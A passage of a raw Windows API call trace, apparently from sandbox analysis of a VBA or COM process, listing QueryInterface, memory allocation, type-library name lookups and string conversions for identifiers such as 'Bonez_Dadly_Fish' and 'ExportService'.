riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5ff0 | out: ppvObject=0x2e5ff0*=0x0) returned 0x80004002 [0032.565] IUnknown:QueryInterface (in: This=0xb4db990, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5fc0 | out: ppvObject=0x2e5fc0*=0x0) returned 0x80004002 [0032.565] IUnknown:QueryInterface (in: This=0xb4db990, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5fb0 | out: ppvObject=0x2e5fb0*=0x0) returned 0x80004002 [0032.565] IUnknown:QueryInterface (in: This=0xb4db990, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5fb8 | out: ppvObject=0x2e5fb8*=0x0) returned 0x80004002 [0032.565] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4db990, ppTypeAttr=0x2e5fe8, pDummy=0x10 | out: ppTypeAttr=0x2e5fe8, pDummy=0x10) returned 0x0 [0032.565] ITypeInfo:LocalReleaseTypeAttr (This=0xb4db990) returned 0x0 [0032.565] IUnknown:AddRef (This=0xb4db990) returned 0x5 [0032.565] IUnknown:Release (This=0xb4db9e8) returned 0x3 [0032.565] IUnknown:Release (This=0xb4dba40) returned 0x3 [0032.565] IMalloc:Free (This=0x7fefe015380, pv=0xb494a50) [0032.565] IUnknown:AddRef (This=0xb4db990) returned 0x5 [0032.565] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce5b0) [0032.565] IMalloc:Free (This=0x7fefe015380, pv=0xb5ce580) [0032.565] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0xb5ce580 [0032.565] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0xb5ce5b0 [0032.565] IUnknown:QueryInterface (in: This=0xb4db9e8, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e6020 | out: ppvObject=0x2e6020*=0x0) returned 0x80004002 [0032.565] IUnknown:QueryInterface (in: This=0xb4db9e8, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5ff0 | out: ppvObject=0x2e5ff0*=0x0) returned 0x80004002 [0032.565] IUnknown:QueryInterface (in: This=0xb4db9e8, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5fe0 | out: ppvObject=0x2e5fe0*=0x0) returned 0x80004002 [0032.565] IUnknown:QueryInterface (in: This=0xb4db9e8, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5fe8 | out: ppvObject=0x2e5fe8*=0x0) returned 0x80004002 [0032.565] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4db9e8, ppTypeAttr=0x2e6018, pDummy=0x10 | out: ppTypeAttr=0x2e6018, pDummy=0x10) returned 0x0 [0032.566] ITypeInfo:LocalReleaseTypeAttr (This=0xb4db9e8) returned 0x0 [0032.566] IUnknown:AddRef (This=0xb4db9e8) returned 0x4 [0032.566] IUnknown:QueryInterface (in: This=0xb4dba40, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e6030 | out: ppvObject=0x2e6030*=0x0) returned 0x80004002 [0032.566] IUnknown:QueryInterface (in: This=0xb4dba40, riid=0x7fee3a76b40*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e6000 | out: ppvObject=0x2e6000*=0x0) returned 0x80004002 [0032.566] IUnknown:QueryInterface (in: This=0xb4dba40, riid=0x7fee3a7add8*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5ff0 | out: ppvObject=0x2e5ff0*=0x0) returned 0x80004002 [0032.566] IUnknown:QueryInterface (in: This=0xb4dba40, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e5ff8 | out: ppvObject=0x2e5ff8*=0x0) returned 0x80004002 [0032.566] ITypeInfo:RemoteGetTypeAttr (in: This=0xb4dba40, ppTypeAttr=0x2e6028, pDummy=0x10 | out: ppTypeAttr=0x2e6028, pDummy=0x10) returned 0x0 [0032.566] ITypeInfo:LocalReleaseTypeAttr (This=0xb4dba40) returned 0x0 [0032.566] IUnknown:AddRef (This=0xb4dba40) returned 0x4 [0032.566] IUnknown:AddRef (This=0xb4db990) returned 0x5 [0032.566] IUnknown:AddRef (This=0xb4db9e8) returned 0x4 [0032.577] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x93a0000 [0032.585] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Bonez_Dadly_Fish") returned 0x10c952 [0032.585] strcpy_s (in: _Dst=0x2e4d40, _DstSize=0x11, _Src="Bonez_Dadly_Fish" | out: _Dst="Bonez_Dadly_Fish") returned 0x0 [0032.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4d40, cbMultiByte=17, lpWideCharStr=0x2e4b90, cchWideChar=17 | out: lpWideCharStr="Bonez_Dadly_Fish") returned 17 [0032.585] IUnknown:AddRef (This=0x782a220) returned 0x8 [0032.585] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="Bonez_Dadly_Fish", lHashVal=0x10c952, pfName=0x2e4c60, pBstrLibName=0x2e4b90 | out: pfName=0x2e4c60*=0, pBstrLibName=0x2e4b90) returned 0x0 [0032.585] IUnknown:Release (This=0x782a220) returned 0x7 [0032.585] IUnknown:AddRef (This=0x731da90) returned 0x14 [0032.585] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="Bonez_Dadly_Fish", lHashVal=0x10c952, pfName=0x2e4c60, pBstrLibName=0x2e4b90 | out: pfName=0x2e4c60*=0, pBstrLibName=0x2e4b90) returned 0x0 [0032.585] IUnknown:Release (This=0x731da90) returned 0x13 [0032.585] IUnknown:AddRef (This=0x731cc80) returned 0x12 [0032.585] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="Bonez_Dadly_Fish", lHashVal=0x10c952, pfName=0x2e4c60, pBstrLibName=0x2e4b90 | out: pfName=0x2e4c60*=0, pBstrLibName=0x2e4b90) returned 0x0 [0032.585] IUnknown:Release (This=0x731cc80) returned 0x11 [0032.585] IUnknown:AddRef (This=0x7829f50) returned 0x7 [0032.585] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="Bonez_Dadly_Fish", lHashVal=0x10c952, pfName=0x2e4c60, pBstrLibName=0x2e4b90 | out: pfName=0x2e4c60*=0, pBstrLibName=0x2e4b90) returned 0x0 [0032.585] IUnknown:Release (This=0x7829f50) returned 0x6 [0032.585] IUnknown:AddRef (This=0x778f570) returned 0x3 [0032.585] IUnknown:Release (This=0x778f570) returned 0x2 [0032.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="075b6852dd", cchWideChar=11, lpMultiByteStr=0x2e49f0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="075b6852dd", lpUsedDefaultChar=0x0) returned 11 [0032.585] GetLocalTime (in: lpSystemTime=0x2e4ad8 | out: lpSystemTime=0x2e4ad8*(wYear=0x7e1, wMonth=0x8, wDayOfWeek=0x4, wDay=0x11, wHour=0xd, wMinute=0x35, wSecond=0x23, wMilliseconds=0x1e5)) [0032.585] _ultow_s (in: _Value=0x5b6852df, _Buffer=0xb4c69ac, _BufferCount=0x9, _Radix=16 | out: _Buffer="5b6852df") returned 0x0 [0032.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0<5b6852df", cchWideChar=11, lpMultiByteStr=0x2e4a30, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0<5b6852df", lpUsedDefaultChar=0x0) returned 11 [0032.586] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x9cf0000 [0032.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb52c956, cbMultiByte=10, lpWideCharStr=0x9cf0064, cchWideChar=22 | out: lpWideCharStr="User-Agent") returned 10 [0032.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="User-Agent", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0032.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="User-Agent", cchWideChar=10, lpMultiByteStr=0x7573f52, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="User-Agentÿÿÿÿè\x01", lpUsedDefaultChar=0x0) returned 10 [0032.587] IMalloc:Free (This=0x7fefe015380, pv=0x54f4870) [0032.587] strcpy_s (in: _Dst=0xb500c30, _DstSize=0xb, _Src="ShugarMilk" | out: _Dst="ShugarMilk") returned 0x0 [0032.587] strcpy_s (in: _Dst=0x78017e8, _DstSize=0x2, _Src="e" | out: _Dst="e") returned 0x0 [0032.587] IMalloc:Free (This=0x7fefe015380, pv=0x7846110) [0032.587] strcpy_s (in: _Dst=0xb500c48, _DstSize=0xc, _Src="AnimPowerup" | out: _Dst="AnimPowerup") returned 0x0 [0032.587] strcpy_s (in: _Dst=0x78017f8, _DstSize=0x4, _Src="pwr" | out: _Dst="pwr") returned 0x0 [0032.587] IMalloc:Free (This=0x7fefe015380, pv=0x7846110) [0032.587] strcpy_s (in: _Dst=0xb500c60, _DstSize=0x9, _Src="AnimExpl" | out: _Dst="AnimExpl") returned 0x0 [0032.587] strcpy_s (in: _Dst=0x7801808, _DstSize=0x2, _Src="I" | out: _Dst="I") returned 0x0 [0032.587] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0xb5c5910 [0032.587] IMalloc:Free (This=0x7fefe015380, pv=0x7846110) [0032.587] strcpy_s (in: _Dst=0xb500c78, _DstSize=0xd, _Src="MakeFarplane" | out: _Dst="MakeFarplane") returned 0x0 [0032.587] strcpy_s (in: _Dst=0x7801818, _DstSize=0x2, _Src="a" | out: _Dst="a") returned 0x0 [0032.588] strcpy_s (in: _Dst=0x7801828, _DstSize=0x2, _Src="b" | out: _Dst="b") returned 0x0 [0032.588] strcpy_s (in: _Dst=0x7801838, _DstSize=0x2, _Src="c" | out: _Dst="c") returned 0x0 [0032.588] IMalloc:Free (This=0x7fefe015380, pv=0x7846110) [0032.588] strcpy_s (in: _Dst=0xb500c90, _DstSize=0x9, _Src="DropFlag" | out: _Dst="DropFlag") returned 0x0 [0032.588] IMalloc:Free (This=0x7fefe015380, pv=0x7846110) [0032.588] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0xb5c5b60 [0032.588] strcpy_s (in: _Dst=0xb500ca8, _DstSize=0xa, _Src="WriteChat" | out: _Dst="WriteChat") returned 0x0 [0032.588] IMalloc:Free (This=0x7fefe015380, pv=0x7846110) [0032.588] strcpy_s (in: _Dst=0xb500cc0, _DstSize=0xa, _Src="mapRender" | out: _Dst="mapRender") returned 0x0 [0032.588] IMalloc:Free (This=0x7fefe015380, pv=0x7846110) [0032.588] strcpy_s (in: _Dst=0xb500cd8, _DstSize=0xe, _Src="MakeFarplane2" | out: _Dst="MakeFarplane2") returned 0x0 [0032.588] IMalloc:Free (This=0x7fefe015380, pv=0x7846110) [0032.588] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0xb5c5db0 [0032.588] strcpy_s (in: _Dst=0xb500cf0, _DstSize=0x7, _Src="Vertik" | out: _Dst="Vertik") returned 0x0 [0032.588] IMalloc:Free (This=0x7fefe015380, pv=0x7846110) [0032.588] strcpy_s (in: _Dst=0xb500d00, _DstSize=0x9, _Src="FindNext" | out: _Dst="FindNext") returned 0x0 [0032.588] strcpy_s (in: _Dst=0x7801848, _DstSize=0x2, _Src="R" | out: _Dst="R") returned 0x0 [0032.588] strcpy_s (in: _Dst=0x7801858, _DstSize=0x2, _Src="S" | out: _Dst="S") returned 0x0 [0032.588] IMalloc:Free (This=0x7fefe015380, pv=0x7846110) [0032.588] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0xb5c6000 [0032.588] strcpy_s (in: _Dst=0xb500d18, _DstSize=0x10, _Src="AnimTransferMap" | out: _Dst="AnimTransferMap") returned 0x0 [0032.588] strcpy_s (in: _Dst=0x7801868, _DstSize=0x8, _Src="Caption" | out: _Dst="Caption") returned 0x0 [0032.588] strcpy_s (in: _Dst=0x7801878, _DstSize=0xe, _Src="IsMapTransfer" | out: _Dst="IsMapTransfer") returned 0x0 [0032.588] IMalloc:Free (This=0x7fefe015380, pv=0x7846110) [0032.588] strcpy_s (in: _Dst=0xb500d30, _DstSize=0x11, _Src="AnimTransferMap2" | out: _Dst="AnimTransferMap2") returned 0x0 [0032.588] strcpy_s (in: _Dst=0x7801890, _DstSize=0x4, _Src="cry" | out: _Dst="cry") returned 0x0 [0032.588] IMalloc:Free (This=0x7fefe015380, pv=0x7846110) [0032.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x72321c4, cbMultiByte=6, lpWideCharStr=0x93a0364, cchWideChar=14 | out: lpWideCharStr="Rabbit") returned 6 [0032.611] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ExportService") returned 0x106509 [0032.611] strcpy_s (in: _Dst=0x2e4d40, _DstSize=0xe, _Src="ExportService" | out: _Dst="ExportService") returned 0x0 [0032.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4d40, cbMultiByte=14, lpWideCharStr=0x2e4b90, cchWideChar=14 | out: lpWideCharStr="ExportService") returned 14 [0032.612] IUnknown:AddRef (This=0x782a220) returned 0x8 [0032.612] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="ExportService", lHashVal=0x106509, pfName=0x2e4c60, pBstrLibName=0x2e4b90 | out: pfName=0x2e4c60*=0, pBstrLibName=0x2e4b90) returned 0x0 [0032.612] IUnknown:Release (This=0x782a220) returned 0x7 [0032.612] IUnknown:AddRef (This=0x731da90) returned 0x14 [0032.612] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="ExportService", lHashVal=0x106509, pfName=0x2e4c60, pBstrLibName=0x2e4b90 | out: pfName=0x2e4c60*=0, pBstrLibName=0x2e4b90) returned 0x0 [0032.612] IUnknown:Release (This=0x731da90) returned 0x13 [0032.612] IUnknown:AddRef (This=0x731cc80) returned 0x12 [0032.612] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="ExportService", lHashVal=0x106509, pfName=0x2e4c60, pBstrLibName=0x2e4b90 | out: pfName=0x2e4c60*=0, pBstrLibName=0x2e4b90) returned 0x0 [0032.612] IUnknown:Release (This=0x731cc80) returned 0x11 [0032.612] IUnknown:AddRef (This=0x7829f50) returned 0x7 [0032.612] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="ExportService", lHashVal=0x106509, pfName=0x2e4c60, pBstrLibName=0x2e4b90 | out: pfName=0x2e4c60*=0, pBstrLibName=0x2e4b90) returned 0x0 [0032.612] IUnknown:Release (This=0x7829f50) returned 0x6 [0032.612] IUnknown:AddRef (This=0x778f570) returned 0x3 [0032.613] IUnknown:Release (This=0x778f570) returned 0x2 [0032.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="065b6852dd", cchWideChar=11, lpMultiByteStr=0x2e49f0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="065b6852dd", lpUsedDefaultChar=0x0) returned 11 [0032.613] GetLocalTime (in: lpSystemTime=0x2e4ad8 | out: lpSystemTime=0x2e4ad8*(wYear=0x7e1, wMonth=0x8, wDayOfWeek=0x4, wDay=0x11, wHour=0xd, wMinute=0x35, wSecond=0x23, wMilliseconds=0x1f5)) [0032.613] _ultow_s (in: _Value=0x5b6852df, _Buffer=0xb4c6974, _BufferCount=0x9, _Radix=16 | out: _Buffer="5b6852df") returned 0x0 [0032.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0=5b6852df", cchWideChar=11, lpMultiByteStr=0x2e4a30, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0=5b6852df", lpUsedDefaultChar=0x0) returned 11 [0032.613] IMalloc:Free (This=0x7fefe015380, pv=0x54f4870) [0032.614] strcpy_s (in: _Dst=0xb5c6328, _DstSize=0xe, _Src="ExportService" | out: _Dst="ExportService") returned 0x0 [0032.614] strcpy_s (in: _Dst=0x78018a0, _DstSize=0x2, _Src="D" | out: _Dst="D") returned 0x0 [0032.614] IMalloc:Free (This=0x7fefe015380, pv=0x7846110) [0032.615] IMalloc:Free (This=0x7fefe015380, pv=0x780f0c0) [0032.618] VirtualFree (lpAddress=0x9cf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0032.620] IMalloc:Free (This=0x7fefe015380, pv=0x75df070) [0032.620] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494c10 [0032.620] IMalloc:Free (This=0x7fefe015380, pv=0xb494c10) [0032.620] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494c10 [0032.620] IMalloc:Free (This=0x7fefe015380, pv=0xb494c10) [0032.621] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494c10 [0032.621] IMalloc:Free (This=0x7fefe015380, pv=0xb494c10) [0032.621] IMalloc:Alloc (This=0x7fefe015380, cb=0x12) returned 0xb494c10 [0032.621] IMalloc:Free (This=0x7fefe015380, pv=0xb494c10) [0032.621] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494c10 [0032.621] IMalloc:Free (This=0x7fefe015380, pv=0xb494c10) [0032.622] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494c10 [0032.622] IMalloc:Free (This=0x7fefe015380, pv=0xb494c10) [0032.622] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494c10 [0032.622] IMalloc:Free (This=0x7fefe015380, pv=0xb494c10) [0032.622] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494c10 [0032.622] IMalloc:Free (This=0x7fefe015380, pv=0xb494c10) [0032.622] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494c10 [0032.622] IMalloc:Free (This=0x7fefe015380, pv=0xb494c10) [0032.623] IMalloc:Alloc (This=0x7fefe015380, cb=0x11) returned 0xb494c10 [0032.623] IMalloc:Free (This=0x7fefe015380, pv=0xb494c10) [0032.623] IMalloc:Alloc (This=0x7fefe015380, cb=0x11) returned 0xb494c10 [0032.623] IMalloc:Free (This=0x7fefe015380, pv=0xb494c10) [0032.623] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb494c10 [0032.623] IMalloc:Free (This=0x7fefe015380, pv=0xb494c10) [0032.626] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x9cf0000 [0032.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7837ffc, cbMultiByte=10, lpWideCharStr=0x9cf00dc, cchWideChar=22 | out: lpWideCharStr="AnimExpl 4") returned 10 [0032.646] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="doc_string") returned 0x105248 [0032.646] strcpy_s (in: _Dst=0x2e4c20, _DstSize=0xb, _Src="doc_string" | out: _Dst="doc_string") returned 0x0 [0032.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4c20, cbMultiByte=11, lpWideCharStr=0x2e4a70, cchWideChar=11 | out: lpWideCharStr="doc_string") returned 11 [0032.646] IUnknown:AddRef (This=0x782a220) returned 0x8 [0032.646] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="doc_string", lHashVal=0x105248, pfName=0x2e4b40, pBstrLibName=0x2e4a70 | out: pfName=0x2e4b40*=0, pBstrLibName=0x2e4a70) returned 0x0 [0032.646] IUnknown:Release (This=0x782a220) returned 0x7 [0032.646] IUnknown:AddRef (This=0x731da90) returned 0x14 [0032.646] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="doc_string", lHashVal=0x105248, pfName=0x2e4b40, pBstrLibName=0x2e4a70 | out: pfName=0x2e4b40*=0, pBstrLibName=0x2e4a70) returned 0x0 [0032.646] IUnknown:Release (This=0x731da90) returned 0x13 [0032.646] IUnknown:AddRef (This=0x731cc80) returned 0x12 [0032.646] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="doc_string", lHashVal=0x105248, pfName=0x2e4b40, pBstrLibName=0x2e4a70 | out: pfName=0x2e4b40*=0, pBstrLibName=0x2e4a70) returned 0x0 [0032.646] IUnknown:Release (This=0x731cc80) returned 0x11 [0032.646] IUnknown:AddRef (This=0x7829f50) returned 0x7 [0032.646] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="doc_string", lHashVal=0x105248, pfName=0x2e4b40, pBstrLibName=0x2e4a70 | out: pfName=0x2e4b40*=0, pBstrLibName=0x2e4a70) returned 0x0 [0032.646] IUnknown:Release (This=0x7829f50) returned 0x6 [0032.646] IMalloc:Alloc (This=0x7fefe015380, cb=0x12) returned 0xb494c10 [0032.646] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_doc_string") returned 0x10c0b2 [0032.647] strcpy_s (in: _Dst=0x2e4dd0, _DstSize=0x12, _Src="_B_var_doc_string" | out: _Dst="_B_var_doc_string") returned 0x0 [0032.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4dd0, cbMultiByte=18, lpWideCharStr=0x2e4c20, cchWideChar=18 | out: lpWideCharStr="_B_var_doc_string") returned 18 [0032.647] IUnknown:AddRef (This=0x782a220) returned 0x8 [0032.647] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_doc_string", lHashVal=0x10c0b2, pfName=0x2e4cf0, pBstrLibName=0x2e4c20 | out: pfName=0x2e4cf0*=0, pBstrLibName=0x2e4c20) returned 0x0 [0032.647] IUnknown:Release (This=0x782a220) returned 0x7 [0032.647] IUnknown:AddRef (This=0x731da90) returned 0x14 [0032.647] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_doc_string", lHashVal=0x10c0b2, pfName=0x2e4cf0, pBstrLibName=0x2e4c20 | out: pfName=0x2e4cf0*=0, pBstrLibName=0x2e4c20) returned 0x0 [0032.647] IUnknown:Release (This=0x731da90) returned 0x13 [0032.647] IUnknown:AddRef (This=0x731cc80) returned 0x12 [0032.647] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_doc_string", lHashVal=0x10c0b2, pfName=0x2e4cf0, pBstrLibName=0x2e4c20 | out: pfName=0x2e4cf0*=0, pBstrLibName=0x2e4c20) returned 0x0 [0032.647] IUnknown:Release (This=0x731cc80) returned 0x11 [0032.647] IUnknown:AddRef (This=0x7829f50) returned 0x7 [0032.647] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_doc_string", lHashVal=0x10c0b2, pfName=0x2e4cf0, pBstrLibName=0x2e4c20 | out: pfName=0x2e4cf0*=0, pBstrLibName=0x2e4c20) returned 0x0 [0032.647] IUnknown:Release (This=0x7829f50) returned 0x6 [0032.647] IUnknown:AddRef (This=0x782b300) returned 0x7 [0032.647] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_doc_string", lHashVal=0x10c0b2, pfName=0x2e4cf0, pBstrLibName=0x2e4c20 | out: pfName=0x2e4cf0*=0, pBstrLibName=0x2e4c20) returned 0x0 [0032.647] IUnknown:Release (This=0x782b300) returned 0x6 [0032.647] IUnknown:AddRef (This=0x782a220) returned 0x8 [0032.647] IUnknown:Release (This=0x782a220) returned 0x7 [0032.648] IUnknown:AddRef (This=0xb4db9e8) returned 0x4 [0032.648] IUnknown:AddRef (This=0xb4dba40) returned 0x4 [0032.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Class", cchWideChar=6, lpMultiByteStr=0x2e4730, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Class", lpUsedDefaultChar=0x0) returned 6 [0032.648] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Class") returned 0x10bb1a [0032.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Class", cchWideChar=6, lpMultiByteStr=0x2e4730, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Class", lpUsedDefaultChar=0x0) returned 6 [0032.648] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Class") returned 0x10bb1a [0032.648] GetLocalTime (in: lpSystemTime=0x2e4b28 | out: lpSystemTime=0x2e4b28*(wYear=0x7e1, wMonth=0x8, wDayOfWeek=0x4, wDay=0x11, wHour=0xd, wMinute=0x35, wSecond=0x23, wMilliseconds=0x224)) [0032.648] _ultow_s (in: _Value=0x5b6852df, _Buffer=0xb4c65d4, _BufferCount=0x9, _Radix=16 | out: _Buffer="5b6852df") returned 0x0 [0032.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0>5b6852df", cchWideChar=11, lpMultiByteStr=0x2e4a80, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0>5b6852df", lpUsedDefaultChar=0x0) returned 11 [0032.648] IUnknown:AddRef (This=0xb4db9e8) returned 0x4 [0032.648] IUnknown:AddRef (This=0xb4dba40) returned 0x5 [0032.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Class", cchWideChar=6, lpMultiByteStr=0x2e44e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Class", lpUsedDefaultChar=0x0) returned 6 [0032.648] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Class") returned 0x10bb1a [0032.648] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Class", cchWideChar=6, lpMultiByteStr=0x2e44e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Class", lpUsedDefaultChar=0x0) returned 6 [0032.649] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Class") returned 0x10bb1a [0032.649] IUnknown:AddRef (This=0xb4db9e8) returned 0x4 [0032.649] IUnknown:AddRef (This=0xb4db990) returned 0x5 [0032.649] IMalloc:Alloc (This=0x7fefe015380, cb=0x14) returned 0xb494c10 [0032.649] IUnknown:AddRef (This=0xb4dba40) returned 0x5 [0032.649] IUnknown:AddRef (This=0xb4db990) returned 0x5 [0032.649] IMalloc:Alloc (This=0x7fefe015380, cb=0x118) returned 0xb553da0 [0032.650] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7668a60 [0032.650] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7668a90 [0032.650] strcpy_s (in: _Dst=0xb5c6400, _DstSize=0x6, _Src="Class" | out: _Dst="Class") returned 0x0 [0032.650] IMalloc:Alloc (This=0x7fefe015380, cb=0x50) returned 0xb5a6090 [0032.650] strcpy_s (in: _Dst=0xb5c6428, _DstSize=0xb, _Src="VBInternal" | out: _Dst="VBInternal") returned 0x0 [0032.650] IUnknown:AddRef (This=0xb4db990) returned 0x5 [0032.650] IMalloc:Alloc 